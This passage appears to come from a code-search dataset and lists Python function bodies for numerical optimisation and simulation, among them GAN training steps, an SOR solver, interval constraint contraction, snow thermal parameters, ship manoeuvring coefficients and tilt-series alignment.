self.shape0,self.var_axes0)\n \n else:\n z0, zvar0 = self.est0.est(self.r0, self.rvar0, return_cost=False)\n cost0 = 0\n self.z0 = z0\n self.zvar0 = zvar0\n self.cost0 = cost0 \n\n \n # Compute total cost and constraint \n cost_new = self.cost0 + self.cost1 \n if not self.map_est:\n cost_new += self.cost_gauss()\n \n # Step size adaptation\n if (self.step_adapt) and (it > 0):\n if (con_new < self.con):\n self.step = np.minimum(1,self.step_inc*self.step)\n else:\n self.step = np.maximum(self.step_min, self.step_dec*self.step)\n self.cost=cost_new\n self.con=con_new\n \n t2 = time.time()\n self.time_est0 = t2-t1\n self.time_iter = t2-t0\n \n # Print progress\n if self.prt_period > 0:\n if (it % self.prt_period == 0):\n if self.comp_cost:\n print(\"it={0:4d} cost={1:12.4e} con={2:12.4e} step={3:12.4e}\".format(\\\n it, self.cost, self.con, self.step))\n else:\n print(\"it={0:4d} con={1:12.4e}\".format(\\\n it, self.con))\n \n # Save history\n self.save_hist()", "def optimizeposition(areas, omegas, x0, x1, z0, z1):\n\n # initial position of each quadpoint is at the center\n # of the edge connecting the midpoint and a corner point\n rhos = 0.5 * ones(4)\n a = 1 / sqrt(3)\n deltarhos = 0.25 * ones(4) # delta for finite differences\n\n while True: # while method has not converged\n # print(\"################## new iteration #############\")\n rhs = f(rhos, omegas, a, x0, x1, z0, z1, areas)\n print(\"##\")\n print(rhs)\n print(rhos)\n if norm(rhs) < 1e-5:\n break\n mat = df(rhos, omegas, a, x0, x1, z0, z1, areas, deltarhos)\n update = solve(mat, rhs)\n\n rhos += update\n # for i in range(4):\n # rhos[i] = max(0,min(1,rhos[i]))\n \"\"\"\n print(\"the norm of the rhs is \")\n print(norm(rhs))\n print(mat)\n print(\"rhs\")\n print(rhs)\n print(update)\n print(\"rhos\")\n print(rhos)\n \"\"\"\n # print(alpha)\n return rhos", "def optimize_parameters(self):\r\n # forward\r\n self.forward() # compute fake image/video and reconstruction image/video\r\n\r\n # D_A\r\n self.set_requires_grad([self.D_V], True)\r\n self.set_requires_grad([self.G_t, self.G_u, self.Att, self.classifier], False)\r\n self.optimizer_D.zero_grad() # set D_V's gradients to zero\r\n self.backward_D_V() # calculate graidents for D_V\r\n self.optimizer_D.step() # update D_A's weights\r\n\r\n # G_A and G_B\r\n self.set_requires_grad([self.D_V], False) # Ds require no gradients when optimizing Gs\r\n self.set_requires_grad([self.G_t, self.G_u, self.Att, self.classifier], True)\r\n self.optimizer_G.zero_grad() # set G_t,G_u,Att,classifier's gradients to zero\r\n self.backward_G() # calculate gradients for G_A and G_B\r\n self.optimizer_G.step() # update G_A and G_B's weights\r", "def optimize_parameters(self):\n # forward\n for i in range(min(self.big_iter+1,len(self.orders_rev))):\n if(self.orders_rev):\n # compute fake images and reconstruction images.\n self.forward(i,False)\n # G_A and G_B\n # Ds require no gradients when optimizing Gs\n self.set_requires_grad(self.netD, False)\n # set G_A and G_B's gradients to zero\n self.optimizers_G[self.orders_rev[i]].zero_grad()\n # calculate gradients for G_A and G_B\n self.backward_G(i,False)\n # update G_A and G_B's weights\n self.optimizers_G[self.orders_rev[i]].step()\n # D_A and D_B\n self.set_requires_grad(self.netD, True)\n self.optimizer_D.zero_grad() \n self.backward_D(i,False) \n self.optimizer_D.step() \n else:\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_DY() # calculate gradients for D_A\n self.optimizer_D.step()\n for i in range(min(self.big_iter+1, len(self.orders))):\n if(self.orders):\n if(i>0):\n self.real_A = self.fake_B.detach()\n self.forward(i,True) # compute fake images and reconstruction images.\n # G_A and G_B\n # Ds require no gradients when optimizing Gs\n self.set_requires_grad(self.netD, False)\n # set G_A and G_B's gradients to zero\n self.optimizers_G[self.orders[i]].zero_grad()\n self.backward_G(i,True) # calculate gradients for G_A and G_B\n # update G_A and G_B's weights\n self.optimizers_G[self.orders[i]].step()\n # D_A and D_B\n self.set_requires_grad(self.netD, True)\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_D(i,True) # calculate gradients for D_A\n self.optimizer_D.step() \n else:\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_DX() # calculate gradients for D_A\n self.optimizer_D.step() \n self.current_label=self.labels[0]\n self.current_order=self.orders\n self.current_pred = np.concatenate((self.pred_real.detach().cpu().numpy().mean(\n axis=2).mean(axis=2), self.pred_fake.detach().cpu().numpy().mean(axis=2).mean(axis=2)))", "def _reset_parameters(self):\n self._solver_input[\"P\"] = cvxopt.matrix(2.0 * self.opt.P(self.p).toarray())\n self._solver_input[\"q\"] = cvxopt.matrix(self.opt.q(self.p).toarray().flatten())\n if self.opt_type in CONSTRAINED_OPT:\n if self.opt.nk > 0:\n self._solver_input[\"G\"] = cvxopt.matrix(-self.opt.M(self.p).toarray())\n self._solver_input[\"h\"] = cvxopt.matrix(\n self.opt.c(self.p).toarray().flatten()\n )\n if self.opt.na > 0:\n self._solver_input[\"A\"] = cvxopt.matrix(self.opt.A(self.p).toarray())\n self._solver_input[\"b\"] = cvxopt.matrix(-self.opt.b(self.p).toarray())", "def update_model_parameters(phi, T, nz, coord, SWVD, form=\"Calonne\"):\r\n D_eff = np.ones(nz)\r\n\r\n if form == \"Hansen\": # Hansen and Foslien (2015)\r\n D_eff = phi * (1 - phi) * D0 + D0\r\n elif form == \"Calonne\": # Calonne et al. (2014)\r\n x = 2 / 3 - phi\r\n b = np.heaviside(x, 1)\r\n D_eff = D0 * (1 - 3 / 2 * phi) * b\r\n else:\r\n print(\"requested method not available, check input\")\r\n\r\n ## effective thermal conductivity W/m/K\r\n k_eff = np.ones(nz)\r\n\r\n if form == \"Hansen\": # Hansen and Foslien (2015)\r\n k_eff = phi * ((1 - phi) * k_a + phi * k_i) + k_a\r\n elif form == \"Calonne\": # Calonne et al. (2011)\r\n k_eff = ka0 + ka1 * (rho_i * phi) + ka2 * (rho_i * phi) ** 2\r\n else:\r\n print(\"requested method not available, check input\")\r\n\r\n ## effective heat capacity - similar forumla in Hansen and Foslien (2015) and Löwe et al. (2019)\r\n rhoC_eff = np.zeros(nz)\r\n rhoC_eff = phi * rho_i * C_i + (np.ones(nz) - phi) * rho_a * C_a\r\n\r\n ## Water Vapor density rho_v and its derivative rho_v_dT:\r\n [rho_v, rho_v_dT] = sat_vap_dens(nz, T, SWVD)\r\n\r\n return D_eff, k_eff, rhoC_eff, rho_v, rho_v_dT", "def contractor(self, *args, **kwargs):\n vertices = copy.deepcopy(args[0])\n nrange = len(vertices[0])\n xpts = []\n ypts = []\n for i in range(nrange):\n xpts.append(vertices[0][i].value)\n ypts.append(vertices[1][i].value)\n constraint = copy.deepcopy(args[1])\n \n \n \n \n qxdot,qxddot,qydot,qyddot = self.update_allq(xpts,ypts)\n \n ## the all important computation split (need to abstract this kind of thing)\n ##lhs = (np.sqrt(qxdot*qxdot + qydot*qydot)**3.) *constraint\n lhs = ( ( np.sqrt(qxdot**2 + qydot**2) )**3 )*constraint\n \n # check2 = qxdot*qyddot\n # if check2.width() < 1.e-2:\n # check2.min.value = check2.real.value\n # check2.max.value = check2.real.value\n # t1 = (lhs - check2)/qydot\n \n #\n # qyddot\n #\n check2 = qydot*qxddot\n if check2.width() < 1.e-2 and check2.contains(0.):\n check2.inf = 0.\n check2.sup = 0.\n #if qxdot.contains(0.) and abs(qxdot.min.value)>1.e-6:\n # print 'qxdot = ',qxdot\n # print 'qxdot not invertable, implement other logic please'\n if abs(float(qxdot.inf))<1.e-6:\n qxdot.inf = 1.e-10\n print 'invert qxdot'\n print 'qxdot = ', qxdot\n \n #t1 = (lhs + qydot*qxddot)/(qxdot)\n t1 = (lhs + check2)/(qxdot)\n \n t1 = t1 & qyddot # go ahead and shrink t1 to qyddot - they are logically equivalent\n total_ans = []\n useful_indices = []\n bad_indices = []\n for i in range(len(ypts)): \n min_ans = 0.\n for j in range(len(ypts)):\n if j==i:\n pass\n else:\n min_ans = (ypts[j]*float(self.localBasis[2,j])) + min_ans\n min_ans = t1 - min_ans\n if (abs(float(self.localBasis[2,i])) > 0.0):\n min_ans = min_ans/float(self.localBasis[2,i])\n useful_indices.append(i)\n else:\n bad_indices.append(i)\n total_ans.append(min_ans)\n \n new_ans = vector_AND_(ypts, total_ans)\n for i in useful_indices:\n if new_ans[i].isempty == False: # abs( new_ans[i].width() ) > 0.:\n ypts[i] = ypts[i] & new_ans[i]\n qxdot,qxddot,qydot,qyddot = self.update_allq(xpts,ypts)\n else:\n print 'warning, possible constraint violation, curvature 1'\n \n ## \n ## qxdot\n ##\n check2 = qydot*qxddot\n if check2.width() < 1.e-2 and check2.contains(0.):\n check2.inf = 0.\n check2.sup = 0.\n #if qyddot.contains(0.):\n # print 'qyddot = ',qyddot\n # print 'qyddot not invertable, implement other logic please'\n \n if qyddot.contains(0.) and qyddot.width()<1.e-6:\n qxdot.inf = 0.#1.e-10\n print 'invert qyddot'\n print 'qyddot = ',qyddot\n fix = (lhs + check2)*(1./qyddot)#*(qyddot**-1.)\n fix = fix & qxdot # go ahead and shrink fix to qxdot - they are logically equivalent\n total_ans = []\n useful_indices = []\n bad_indices = []\n \n for i in range(len(xpts)): #contract on x[i]\n min_ans = 0.\n for j in range(len(xpts)): # add up all jth pieces of the dot product except i\n if j==i:\n pass\n else:\n \n min_ans = (xpts[j]*float(self.localBasis[1,j] ) ) + min_ans\n min_ans = fix - min_ans\n if (abs(float(self.localBasis[1,i]) ) >0.0 ):\n min_ans = min_ans/float(self.localBasis[1,i])\n useful_indices.append(i)\n else:\n bad_indices.append(i)\n total_ans.append(min_ans)\n \n new_ans = vector_AND_(xpts, total_ans)\n for i in useful_indices:\n if not new_ans[i].isempty: # abs( new_ans[i].width() ) > 0.:\n xpts[i] = xpts[i] & new_ans[i]\n qxdot,qxddot,qydot,qyddot = self.update_allq(xpts,ypts)\n else:\n print 'warning, possible constraint violation, curvature 2'\n \n \n ## switch to the other side\n \n ##\n ## contract on qydot\n ##\n check2 = qxdot*qyddot\n if check2.width() < 1.e-2 and check2.contains(0.):\n check2.inf = 0.\n check2.sup = 0.\n# if qxddot.contains(0.):\n# print 'qxddot = ',qxddot\n# print 'qxddot not invertable, implement other logic please'\n# qxddot.min.value = 0.\n if qxddot.contains(0.):\n qxddot.inf = 0.\n \n print 'invert qxddot'\n print 'qxddot = ',qxddot\n t1 = (lhs - check2)/(-qxddot)#*(-qxddot**-1)\n t1 = t1 & qydot\n total_ans = []\n useful_indices = []\n bad_indices = []\n for i in range(len(ypts)): \n min_ans = 0.\n for j in range(len(ypts)):\n if j==i:\n pass\n else:\n #print 't1 = ',t1\n #print 'ypts[{}] = {}'.format(i,ypts[i])\n #print 'localbasis[{},{}] = {}'.format(1,i,self.localBasis[1,j])\n min_ans = (ypts[j]*float(self.localBasis[1,j])) + min_ans\n min_ans = t1 - min_ans\n if (abs(float(self.localBasis[1,i])) > 0.0):\n min_ans = min_ans/float(self.localBasis[1,i])\n useful_indices.append(i)\n else:\n bad_indices.append(i)\n total_ans.append(min_ans)\n \n new_ans = vector_AND_(ypts, total_ans)\n for i in useful_indices:\n if not new_ans[i].isempty: # abs( new_ans[i].width() ) > 0.:\n ypts[i] = ypts[i] & new_ans[i]\n else:\n print 'warning, possible constraint violation, curvature 3'\n \n ##contract on qxdot\n \n check2 = qxdot*qyddot\n if check2.width() < 1.e-2 and check2.contains(0.):\n check2.inf = 0.\n check2.sup = 0.\n #contract on qxddot\n# if qydot.contains(0.):\n# print 'qydot = ',qxddot\n# print 'qydot not invertable, implement other logic please'\n if qydot.contains(0.):\n qydot.inf = 0.\n print 'invert qydot'\n print 'qydot = ',qydot\n fix = (lhs - qxdot*qyddot)/(-qydot)#*(-qydot**-1)\n fix = fix & qxddot # go ahead and shrink t1 to quddot - they are logically equivalent\n total_ans = []\n useful_indices = []\n bad_indices = []\n for i in range(len(xpts)):\n min_ans = 0.\n for j in range(len(xpts)):\n if j==i:\n pass\n else:\n min_ans = (xpts[j]*float(self.localBasis[2,j] ) ) + min_ans\n min_ans = fix - min_ans\n if (abs(float(self.localBasis[2,i]) ) >0.0 ):\n min_ans = min_ans/float(self.localBasis[2,i])\n useful_indices.append(i)\n else:\n bad_indices.append(i)\n total_ans.append(min_ans)\n \n new_ans = vector_AND_(xpts, total_ans)\n for i in useful_indices:\n if not new_ans[i].isempty: # abs( new_ans[i].width() ) > 0.:\n xpts[i] = xpts[i] & new_ans[i]\n else:\n print 'warning, possible constraint violation, curvature 4'\n \n for i in range(nrange):\n vertices[0][i].value = xpts[i]\n vertices[1][i].value = ypts[i]\n return vertices", "def _advance_settings(self, sol):\r\n if self.cond == True:\r\n # Save last solution...\r\n self.lst_tmp = sol\r\n # Check if all timesteps are complete.\r\n self.current_T += self.d_T\r\n self.step += 1\r\n if self.current_T > self.max_T:\r\n return False\r\n # Set to not be conduction any more\r\n self.cond = False\r\n if len(self.fq_list) > 0:\r\n self.rad = 0\r\n else:\r\n # There are radiation steps to do.\r\n self.cond = True\r\n return True\r\n\r\n # If we're here, we're either not done anything yet or have\r\n # just done a radiation step.\r\n if self.rad != None:\r\n # Save last solution\r\n self.lst_rad[self.rad] = sol\r\n # Advance to next radiation stage if one exists. Else cond.\r\n if self.rad + 1 != len(self.fq_list):\r\n self.rad += 1\r\n else:\r\n self.rad = None\r\n self.cond = True\r\n return True\r\n\r\n # If we've made it to here, we must just setting the simulation\r\n # going.\r\n assert (len(self.fq_list) == len(self.lst_rad))\r\n if len(self.lst_rad) > 0:\r\n assert (len(self.fq_list) == len(self.absorb_coeffs))\r\n assert (self.refr_idx_vol >= 0.0)\r\n # Could set to zero, but that might limit restarts. Just check\r\n # Validity....\r\n assert (self.step != None)\r\n assert (self.d_T > 0.0)\r\n assert (self.current_T != None)\r\n assert (self.max_T != None)\r\n assert (self.max_T > self.current_T)\r\n assert (self.diff_scale >= 0.0)\r\n assert (self.diff_scale <= 1.0)\r\n assert (self.thermal_conductivity > 0.0)\r\n assert (self.alpha >= 0.0)\r\n assert (self.refr_idx_background >= 0.0)\r\n # Set the ball rolling:\r\n if len(self.fq_list) > 0:\r\n # We can set solver for frequencies first...\r\n self.rad = 0\r\n else:\r\n self.cond = True\r\n return True", "def updateParameters(self):\r\n\r\n\t\tif self.approach.altered:\r\n\t\t\tself.transform.enabled = True\r\n\r\n\t\t\tif self.approach.value == 'Locations in the DEM generated from field observations':\r\n\t\t\t\tself.predefined_pattern.enabled = False\r\n\t\t\t\tself.pattern_workspace.enabled = False\r\n\t\t\t\tself.point_matrix_size.enabled = True\r\n\t\t\t\tself.point_vectors.enabled = True\r\n\t\t\t\tself.mapping_field.enabled = True\r\n\t\t\t\tself.move_to_max.enabled = True\r\n\t\t\t\tself.output_sim_matrix.enabled = True\r\n\t\t\t\tself.mh_dil_val.enabled = False\r\n\r\n\t\t\t\tself.mh_iteration.enabled = False\r\n\t\t\t\tself.mh_iteration.value = False\r\n\t\t\t\tself.output_table.enabled = False\r\n\t\t\t\tself.output_raster_workspace.enabled = False\r\n\t\t\t\tself.output_raster_workspace.value = ''\r\n\r\n\t\t\telif self.approach.value == 'Locations in the DEM versus pre-defined pattern':\r\n\t\t\t\tself.predefined_pattern.enabled = True\r\n\t\t\t\tself.point_matrix_size.enabled = True\r\n\t\t\t\tself.point_vectors.enabled = True\r\n\t\t\t\tself.mapping_field.enabled = True\r\n\t\t\t\tself.move_to_max.enabled = True\r\n\t\t\t\tself.mh_dil_val.enabled = True\r\n\t\t\t\tself.mh_iteration.enabled = True\r\n\t\t\t\tself.output_table.enabled = True\r\n\t\t\t\tself.output_sim_matrix.enabled = False\r\n\t\t\t\tself.output_sim_matrix.value = ''\r\n\t\t\t\tself.output_raster_workspace.enabled = False\r\n\t\t\t\tself.output_raster_workspace.value = ''\r\n\r\n\t\t\telse: # seek pre-defined pattern in DEM\r\n\t\t\t\tself.predefined_pattern.enabled = True\r\n\t\t\t\tself.point_matrix_size.enabled = True\r\n\t\t\t\tself.mh_iteration.enabled = True\r\n\t\t\t\tself.output_raster_workspace.enabled = True\r\n\t\t\t\tself.point_vectors.enabled = False\r\n\t\t\t\tself.point_vectors.value = ''\r\n\t\t\t\tself.mapping_field.enabled = False\r\n\t\t\t\tself.move_to_max.enabled = False\r\n\t\t\t\tself.move_to_max.value = False\r\n\t\t\t\tself.mh_dil_val.enabled = True\r\n\t\t\t\tself.output_sim_matrix.enabled = False\r\n\t\t\t\tself.output_sim_matrix.value = ''\r\n\t\t\t\tself.output_table.enabled = False\r\n\t\t\t\tself.output_table.value = ''\r\n\r\n\t\tif self.mh_iteration.altered:\r\n\r\n\t\t\tif self.mh_iteration.value is True:\r\n\t\t\t\tself.mh_dil_start.enabled = True\r\n\t\t\t\tself.mh_dil_stop.enabled = True\r\n\t\t\t\tself.mh_dil_step.enabled = True\r\n\t\t\t\tself.mh_dil_val.enabled = False\r\n\t\t\t\tself.mh_dil_val.value = 1\r\n\r\n\t\t\telse:\r\n\t\t\t\tif self.approach.value == 'Locations in the DEM generated from field observations':\r\n\t\t\t\t\tself.mh_dil_val.enabled = False\r\n\t\t\t\t\tself.mh_dil_val.value = 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.mh_dil_val.enabled = True\r\n\r\n\t\t\t\tself.mh_dil_start.enabled = False\r\n\t\t\t\tself.mh_dil_stop.enabled = False\r\n\t\t\t\tself.mh_dil_step.enabled = False\r\n\t\t\t\tself.mh_dil_start.value = 0.01\r\n\t\t\t\tself.mh_dil_stop.value = 1\r\n\t\t\t\tself.mh_dil_step.value = 0.1\r\n\r\n\t\tif self.move_to_max.altered:\r\n\t\t\tif self.move_to_max.value is True:\r\n\t\t\t\tself.move_to_max_distance.enabled = True\r\n\t\t\telse:\r\n\t\t\t\tself.move_to_max_distance.enabled = False\r\n\t\t\t\tself.move_to_max_distance.value = 3\r\n\r\n\t\tif self.transform.altered:\r\n\t\t\tif self.transform.value == 'Work directly on the elevation matrix':\r\n\t\t\t\tself.size_of_the_cell.enabled = False\r\n\t\t\telif self.transform.value == 'Perform a local translation':\r\n\t\t\t\tself.size_of_the_cell.enabled = False\r\n\t\t\telif self.transform.value == 'Compute slopes' or self.transform.value == \\\r\n\t\t\t\t\t'Compute slopes and perform local translation':\r\n\t\t\t\tself.size_of_the_cell.enabled = True\r\n\r\n\t\tif self.predefined_pattern.altered:\r\n\t\t\tif self.predefined_pattern.value == 'Custom pattern':\r\n\t\t\t\tself.pattern_workspace.enabled = True\r\n\r\n\t\t\t\tself.mh_iteration.value = False\r\n\t\t\t\tself.mh_iteration.enabled = False\r\n\t\t\t\tself.mh_dil_start.enabled = False\r\n\t\t\t\tself.mh_dil_stop.enabled = False\r\n\t\t\t\tself.mh_dil_step.enabled = False\r\n\t\t\t\tself.mh_dil_start.value = 0.01\r\n\t\t\t\tself.mh_dil_stop.value = 1\r\n\t\t\t\tself.mh_dil_step.value = 0.1\r\n\t\t\t\tself.mh_dil_val.enabled = False\r\n\t\t\t\tself.mh_dil_val.value = 1\r\n\t\t\telse:\r\n\t\t\t\tself.pattern_workspace.enabled = False", "def SOR_Solve_Opt(A,b,tol=1.0e-6,max_iterations=100,LOUD=False):\n [Nrow, Ncol] = A.shape\n assert Nrow == Ncol\n N = Nrow\n converged = False\n iteration = 1\n omega = 1\n l = 5\n p = 2\n x = np.random.rand(N) #random initial guess \n x_new = np.zeros(N)\n while not(converged):\n x = x_new.copy() #replace old value\n for row in range(N):\n x_new[row] = b[row]\n for column in range(N):\n if column != row:\n x_new[row] -= A[row,column]*x_new[column]\n x_new[row] /= A[row,row]\n x_new[row] = (1.0-omega) * x[row] + omega*x_new[row]\n relative_change = np.linalg.norm(x_new-x)/np.linalg.norm(x_new)\n #record change after iteration k\n if (l==iteration):\n dxl = np.linalg.norm(x_new-x)\n if (l + p == iteration):\n dxlp = np.linalg.norm(x_new-x)\n omega = 2.0/(1.0+np.sqrt(1-(dxlp/dxl)**(1.0/p)))\n if (LOUD):\n print(\"Iteration\",iteration,\": Relative Change =\",relative_change)\n if (relative_change < tol) or (iteration >= max_iterations):\n converged = True\n iteration += 1\n return x_new", "def get_sol(self):", "def _compute_correction(self, initial_state, final_state, a, b, c, s):\r\n pertub = self.pertub\r\n pertub_s = pertub *10\r\n \r\n pred_no_pertub = self._motion_update_one_shot(initial_state, a, b, c, s)\r\n pred_pertub_a = self._motion_update_one_shot(initial_state, a +pertub, b, c, s)\r\n pred_pertub_b = self._motion_update_one_shot(initial_state, a, b +pertub, c, s)\r\n # no need to correct C, C is constrained by kappa_final\r\n # # pred_pertub_c = self._motion_update_one_shot(initial_state, a, b, c +pertub, s)\r\n pred_pertub_s = self._motion_update_one_shot(initial_state, a, b, c, s +pertub_s)\r\n\r\n d_state = np.zeros((3,1))\r\n d_pertub_state = np.zeros((3,3))\r\n Jacobian = np.zeros((3,3))\r\n for i in range(0, 3):\r\n d_pertub_state[i][0] = (final_state[i] - pred_pertub_a[i]) # a\r\n d_pertub_state[i][1] = (final_state[i] - pred_pertub_b[i]) # b\r\n # d_pertub_state[i][2] = (final_state[i] - pred_pertub_c[i]) # c (no update)\r\n d_pertub_state[i][2] = (final_state[i] - pred_pertub_s[i]) # s\r\n \r\n d_state[i] = final_state[i] - pred_no_pertub[i]\r\n \r\n Jacobian[i][0] = (d_pertub_state[i][0] - d_state[i])/pertub # a\r\n Jacobian[i][1] = (d_pertub_state[i][1] - d_state[i])/pertub # b\r\n # Jacobian[i][2] = (d_pertub_state[i][2] - d_state[i])/pertub # c (no update)\r\n Jacobian[i][2] = (d_pertub_state[i][2] - d_state[i])/pertub_s # s\r\n\r\n # inv_Jacobian = np.linalg.inv(Jacobian)\r\n inv_Jacobian = np.linalg.pinv(Jacobian)\r\n correction = np.dot(inv_Jacobian, d_state)\r\n # pdb.set_trace()\r\n return correction", "def _compute_solar_torque(self):\n pass", "def initial_parameters(ship_data: dict) -> dict:\n\n mask = df_parameters[\"brix_lambda\"].notnull()\n df_parameters.loc[mask, \"brix_prime\"] = df_parameters.loc[mask].apply(\n calculate_prime, ship_parameters=ship_data, axis=1\n )\n\n df_parameters[\"prime\"] = df_parameters[\"brix_prime\"]\n\n df_parameters.loc[\"Ydelta\", \"prime\"] = 0.003 # Just guessing\n df_parameters.loc[\"Ndelta\", \"prime\"] = (\n -df_parameters.loc[\"Ydelta\", \"prime\"] / 2\n ) # Just guessing\n\n df_parameters.loc[\"Nu\", \"prime\"] = 0\n df_parameters.loc[\"Nur\", \"prime\"] = 0\n # df_parameters.loc[\"Xdelta\", \"prime\"] = -0.001\n df_parameters.loc[\"Xr\", \"prime\"] = 0\n df_parameters.loc[\"Xrr\", \"prime\"] = 0.000\n df_parameters.loc[\"Xu\", \"prime\"] = 0\n df_parameters.loc[\"Xuu\", \"prime\"] = 0\n df_parameters.loc[\"Xv\", \"prime\"] = 0\n df_parameters.loc[\"Xvr\", \"prime\"] = 0\n df_parameters.loc[\"Yu\", \"prime\"] = 0\n df_parameters.loc[\"Yur\", \"prime\"] = 0.00\n\n df_parameters.loc[\"Nuv\", \"prime\"] = 0.0\n df_parameters.loc[\"Xthrust\", \"prime\"] = 1.0\n df_parameters.loc[\"Yrdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Xvdelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Xdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Yvdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Nrdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Yuv\", \"prime\"] = 0.0\n df_parameters.loc[\"Nvdeltadelta\", \"prime\"] = 0.0\n\n df_parameters.loc[\"Ythrustdelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Nthrustdelta\", \"prime\"] = 0.0\n\n parameters = df_parameters[\"prime\"].dropna().to_dict()\n\n return parameters", "def solve(self, **kwargs) -> OptimizationResult:\n raise NotImplementedError", "def construct_param_dict(params,K_RC,K_CP,m_P):\n ###scaling constants\n w=params['w']\n pd=params['pd'] # in 3D and 0.21 in 2D\n pv=params['pv']\n Er=params['Er'] ;Ek=params['Ek']\n ER=params['ER'];EC=params['EC'];EP=params['EP'];\n Eq1=params['Eq1'];Eq2=params['Eq2']\n\n\n #capture success function\n a = params['a']\n b = params['b']\n c = params['c']\n formC = params['formC']\n formPC = params['formPC']\n formPR = params['formPR']\n \n ###variables\n TR= params['TR'] ;TC= params['TC'];TP=params['TP'];D_R= params['D_R']; D_C= params['D_C']\n K_RP=K_RC*K_CP\n fmC=params['fmC'];thermyR=params['thermyR']\n thermyC=params['thermyC'];thermyP=params['thermyP']\n fmPR=params['fmPR']\n fmPC=params['fmPC']\n m_C = K_CP*m_P;m_R = K_RP*m_P\n ###normalization constants and boltzmann constant\n r0 = params['r0']\n k0 = params['k0'] # will depend on the productivity of the habitat\n a01 = a02 = params['a012'] # will depedend on the dimension of the habitat \n a03 = params['a03']\n d0= params['d0']\n q10 = params['q10'];q20 = params['q20'];\n v0R = params['v0R'];v0C =params['v0C'];v0P =params['v0P'];k = b_k\n hC0 = params['hC0'];hP0 = params['hP0'] \n \n #intrapopulation parameters\n q1=set_q1(q10,m_C,w,Eq1,TR,k)\n q2=set_q2(q20,m_P,w,Eq2,TC,k)\n K=set_K(k0,m_R,w,Ek,TR,k)\n r=set_r(r0,m_R,w,Er,TR,k)\n\n #interpopulation parameters\n a1=set_alfa(m_C,a01,K_RC,pv,pd,TR,TC,ER,EC,D_R,v0R,v0C,g,alfa,fmC,thermyR,thermyC,k,a,b,c,formC)\n a2=set_alfa(m_P,a02,K_RP,pv,pd,TR,TP,ER,EP,D_R,v0R,v0P,g,alfa,fmPR,thermyR,thermyP,k,a,b,c,formPR)\n a3=set_alfa(m_P,a03,K_CP,pv,pd,TC,TP,EC,EP,D_C,v0C,v0P,g,alfa,fmPC,thermyC,thermyP,k,a,b,c,formPC)\n\n t_hp = set_th(hP0,m_P,w,EP,k,TP)\n t_hc = set_th(hC0,m_C,w,EC,k,TC)\n param_dict={'q1':q1,'q2':q2,'K':K,'r':r,'a1':a1,'a2':a2,'a3':a3,'t_hp':t_hp,'t_hc':t_hc}\n \n return param_dict", "def solve(self):", "def setOptimizableVariables(self, TiltAlignmentParameters_, optimizableVariables):\n ntilt = self._ntilt\n nmark = len(self._Markers)\n\n nopti = (nmark - 1) * 3\n\n if self.optimizeMarkerPositions:\n # translation\n nopti += (ntilt) * 2\n\n # variable magnifications for projections, exclude scaling of reference image (S==1)\n if TiltAlignmentParameters_.dmag:\n nopti += ntilt - 1\n\n #variable rotation for projections\n if TiltAlignmentParameters_.drot:\n nopti += ntilt\n else:\n nopti += 1\n\n # beam tilt\n if TiltAlignmentParameters_.dbeam:\n nopti += 1\n\n # nopti += ntilt\n ## gradient on image rotation and magnification in projections\n #if TiltAlignmentParameters_.dGradRotMag:\n # nopti = nopti + 2\n\n # check that number of variables is ok\n if len(optimizableVariables) != nopti:\n print(\"Length optimizableVariables: \" + str(len(optimizableVariables)))\n print(\"N optmization: \" + str(nopti))\n raise IndexError('length of optimizableVariables does not match TiltAlignmentParameters')\n\n # marker 3D coords\n ivar = 0\n\n\n for (imark, Marker) in enumerate(self._Markers):\n # reference marker irefmark is fixed to standard value\n if ((imark ) != TiltAlignmentParameters_.irefmark):\n r = numpy.array([optimizableVariables[ivar],\n optimizableVariables[ivar + 1], optimizableVariables[ivar + 2]])\n self._Markers[imark].set_r(r)\n\n ivar = ivar + 3\n\n\n if self.optimizeMarkerPositions:\n # translations\n for itilt in range(0, ntilt):\n # translation in reference projection is zero\n #FFif (self._projIndices[itilt] != TiltAlignmentParameters_.ireftilt):\n self._alignmentTransX[itilt] = optimizableVariables[ivar]\n self._alignmentTransY[itilt] = optimizableVariables[ivar + 1]\n ivar = ivar + 2\n\n\n\n # magnification changes\n if TiltAlignmentParameters_.dmag:\n for itilt in range(0, ntilt):\n # magnification of reference projection is 1.\n if (int(self._projIndices[itilt]) != int(self._projIndices[self.ireftilt])):\n self._alignmentMagnifications[itilt] = optimizableVariables[ivar]\n ivar = ivar + 1\n\n # image rotations\n if TiltAlignmentParameters_.drot:\n for itilt in range(0, ntilt):\n self._alignmentRotations[itilt] = optimizableVariables[ivar]\n ivar = ivar + 1\n # all rotations are the same - take the first one\n else:\n self._alignmentRotations[0] = optimizableVariables[ivar]\n ivar = ivar + 1\n\n\n\n # beam inclination\n if TiltAlignmentParameters_.dbeam:\n self._alignmentBeamTilt = optimizableVariables[ivar]\n ivar = ivar + 1\n\n # focus gradient (TODO)\n #if TiltAlignmentParameters_.dGradRotMag:\n # optimizableVariables[ivar] = self._alignmentMagnFoc\n # optimizableVariables[ivar+1] = self._alignmentRotFoc\n\n\n if not self.optimizeMarkerPositions:\n from pytom.scripts.Rotation_function import calculate_translation\n\n\n # r_model is the modelled x,y,z coordinate of the reference marker\n r_model = self._Markers[self.irefmark].get_r()\n\n # if using a reduced set using an indices existing in the reduced set\n # i = int(numpy.argwhere(self.TiltSeries_._projIndices.astype(int) == self.TiltSeries_._TiltAlignmentParas.ireftilt)[0][0])\n psi_ref = numpy.deg2rad(numpy.mean(self._alignmentRotations) + 90)\n\n for iproj in range(0,ntilt):\n # setting variables\n marker = self._Markers[self.irefmark]\n r_exp_tilt = numpy.array([marker.get_xProj(iproj), marker.get_yProj(iproj)]) - numpy.array(\n self.TiltSeries_._TiltAlignmentParas.cent)\n psi_itilt = numpy.deg2rad(self._alignmentRotations[iproj] + 90)\n theta_itilt = numpy.deg2rad(self._tiltAngles[iproj])\n magnification =self._alignmentMagnifications[iproj]\n\n # calculating translation setting difference model and experimental reference marker point at 0\n tx, ty = calculate_translation(r_model, r_exp_tilt, psi_ref, psi_itilt, theta_itilt, 